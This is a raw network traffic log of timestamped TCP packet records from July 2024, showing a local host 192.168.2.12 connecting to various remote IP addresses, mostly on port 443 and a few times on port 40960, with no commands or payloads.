                            Jul 8, 2024 10:09:32.059658051 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.059663057 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.059748888 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.060635090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.060653925 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.060717106 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.060720921 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.060754061 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.060764074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.063158989 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.063178062 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.063235044 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.063241005 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.063268900 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.063282967 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.066381931 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.066399097 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.066456079 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.066461086 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.066593885 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.067053080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.067099094 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.067121983 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.067131042 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.067151070 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.067169905 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.067358971 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:32.067465067 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.067689896 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:32.381009102 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.381079912 CEST49734443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:32.400109053 CEST49734443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:32.400131941 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.400393963 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.403115988 CEST49734443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:32.444499969 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.567923069 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:32.572782993 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:32.659611940 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.659687042 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:32.659805059 CEST49734443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:32.660600901 CEST49734443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:32.660624027 CEST44349734184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:33.235280991 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:33.235615015 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:33.240499020 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:33.878881931 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:33.894646883 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:40.789109945 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:40.789186954 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:40.789271116 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:40.803965092 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:40.803992033 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:45.140033960 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.140080929 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.140193939 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.140808105 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.140825033 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.936877966 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.936984062 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.940011978 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.940046072 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.940315008 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.941526890 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.941596985 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.941602945 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:45.941701889 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:45.984510899 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:46.118006945 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:46.118267059 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:46.118339062 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:46.118448019 CEST49735443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:09:46.118470907 CEST4434973540.113.103.199192.168.2.12
                            Jul 8, 2024 10:09:48.652333021 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:48.652368069 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:48.652440071 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:48.653780937 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:48.653795004 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.079932928 CEST44349730173.222.162.60192.168.2.12
                            Jul 8, 2024 10:09:49.080142021 CEST49730443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:49.116080046 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.116162062 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.118180990 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.118191004 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.118449926 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.170597076 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.170624971 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.170718908 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.551733017 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.551831961 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.551892042 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.553651094 CEST49736443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.553675890 CEST44349736188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.557581902 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.557636023 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:49.557712078 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.557986021 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:49.558002949 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.063451052 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.063527107 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.064810038 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.064824104 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.065100908 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.068037987 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.068064928 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.068113089 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.499861002 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.499916077 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.499946117 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.499984980 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.499995947 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500025988 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500042915 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500051022 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500072002 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500102997 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500117064 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500194073 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500197887 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500447989 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500490904 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500497103 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500503063 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.500552893 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.500689983 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.547487974 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.607088089 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.607666016 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.607745886 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.607897997 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.607897997 CEST49737443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.607920885 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.607929945 CEST44349737188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.780415058 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.780458927 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:50.780556917 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.780898094 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:50.780911922 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.266097069 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.266177893 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.267435074 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.267445087 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.267682076 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.268913984 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.269088984 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.269123077 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.724488974 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.724582911 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.724658966 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.764290094 CEST49738443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.764332056 CEST44349738188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.932085037 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.932147026 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:51.932250023 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.932584047 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:51.932600975 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.404974937 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.405100107 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.406601906 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.406610966 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.406866074 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.408021927 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.408179998 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.408210993 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.408277988 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.408284903 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.831630945 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.831744909 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:52.831828117 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.832067013 CEST49739443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:52.832087040 CEST44349739188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.035200119 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.035269976 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.035339117 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.035633087 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.035648108 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.528028011 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.528193951 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.529730082 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.529740095 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.529983044 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.531281948 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.531408072 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.531444073 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:53.531511068 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:53.531522036 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:54.072148085 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:54.072269917 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:54.072341919 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:54.072424889 CEST49740443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:54.072443962 CEST44349740188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:54.548868895 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:54.548913002 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:54.548990965 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:54.549288034 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:54.549304008 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.025684118 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.025760889 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.027211905 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.027223110 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.027493954 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.028953075 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.029031992 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.029037952 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.710983992 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.711090088 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:55.711146116 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.711266994 CEST49741443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:55.711292028 CEST44349741188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.209831953 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.209877014 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.209980011 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.210268974 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.210285902 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.716778040 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.716948986 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.718439102 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.718449116 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.718739986 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.720026016 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.720787048 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.720827103 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.721158981 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.721198082 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.721295118 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.721333027 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.721440077 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.721472979 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.721586943 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.721626997 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.721749067 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.721781015 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.743499994 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:56.743657112 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:56.743693113 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:57.502497911 CEST49730443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:57.502531052 CEST44349730173.222.162.60192.168.2.12
                            Jul 8, 2024 10:09:57.503077984 CEST49744443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:57.503149986 CEST44349744173.222.162.60192.168.2.12
                            Jul 8, 2024 10:09:57.503226042 CEST49744443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:57.504650116 CEST49744443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:57.504714012 CEST44349744173.222.162.60192.168.2.12
                            Jul 8, 2024 10:09:57.504774094 CEST49744443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:58.686228037 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:58.686333895 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:58.686394930 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:58.686539888 CEST49742443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:58.686563015 CEST44349742188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:58.734954119 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:58.734989882 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:58.735126019 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:58.735485077 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:58.735502005 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.192257881 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.192332029 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.193731070 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.193753004 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.193990946 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.195420027 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.195451021 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.195508003 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.856070042 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.856173992 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.859287977 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.860822916 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.860822916 CEST49745443192.168.2.12188.114.96.3
                            Jul 8, 2024 10:09:59.860856056 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:09:59.860861063 CEST44349745188.114.96.3192.168.2.12
                            Jul 8, 2024 10:10:06.265608072 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:06.265669107 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:06.265763044 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:06.266099930 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:06.266115904 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.104265928 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.104505062 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.106307030 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.106324911 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.106575012 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.114954948 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.160505056 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.477616072 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.477644920 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.477677107 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.477757931 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.477783918 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.477797985 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.477828026 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.480746031 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.480787992 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.480824947 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.480837107 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.480850935 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.480854988 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.480940104 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.485969067 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.485989094 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:07.486000061 CEST49746443192.168.2.1220.114.59.183
                            Jul 8, 2024 10:10:07.486007929 CEST4434974620.114.59.183192.168.2.12
                            Jul 8, 2024 10:10:15.687383890 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:15.687428951 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:15.687534094 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:15.688148022 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:15.688178062 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.053690910 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.053828955 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.059201956 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.059215069 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.059495926 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.060894966 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.060956955 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.060964108 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.061070919 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.108506918 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.237838984 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.237934113 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:17.238002062 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.238226891 CEST49747443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:17.238250971 CEST4434974740.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:30.119024992 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.119067907 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.119151115 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.119390011 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.119402885 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.758516073 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.758857965 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.758896112 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.759955883 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.760021925 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.760976076 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.761043072 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.811413050 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:30.811455965 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:30.858012915 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:40.723423004 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:40.723520994 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:40.723604918 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:41.344168901 CEST49750443192.168.2.12142.250.185.164
                            Jul 8, 2024 10:10:41.344224930 CEST44349750142.250.185.164192.168.2.12
                            Jul 8, 2024 10:10:55.875056982 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:55.875106096 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:55.875174999 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:55.875741959 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:55.875756025 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:56.678493023 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:56.678662062 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:56.685761929 CEST49752443192.168.2.1240.113.103.199
                            Jul 8, 2024 10:10:56.685797930 CEST4434975240.113.103.199192.168.2.12
                            Jul 8, 2024 10:10:56.686609983 CEST4434975240.113.103.199192.168.2.12
